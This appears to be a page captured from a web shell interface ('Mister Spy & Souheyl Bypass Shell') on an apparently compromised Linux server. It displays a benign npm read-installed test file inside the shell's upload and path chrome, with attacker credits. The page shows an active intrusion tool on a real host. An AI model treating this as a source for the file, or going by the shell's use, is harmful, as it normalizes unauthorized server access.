Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /usr/share/nodejs/npm/node_modules/read-installed/test/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : //usr/share/nodejs/npm/node_modules/read-installed/test/grandparent-peer.js

var readInstalled = require('../read-installed.js')
var test = require('tap').test
var path = require('path');

function allValid(t, map) {
  var deps = Object.keys(map.dependencies || {})
  deps.forEach(function (dep) {
    t.notOk(map.dependencies[dep].invalid, 'dependency ' + dep + ' of ' + map.name + ' is not invalid')
    t.notOk(typeof map.dependencies[dep] === 'string', 'dependency ' + dep + ' of ' + map.name + ' is not missing')
  })
  deps.forEach(function (dep) {
    allValid(t, map.dependencies[dep])
  })
}

test('grandparent can satisfy peer dependencies', function(t) {
  readInstalled(
    path.join(__dirname, 'fixtures/grandparent-peer'),
    { log: console.error },
    function(err, map) {
      allValid(t, map)
      t.end()
    })
})

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net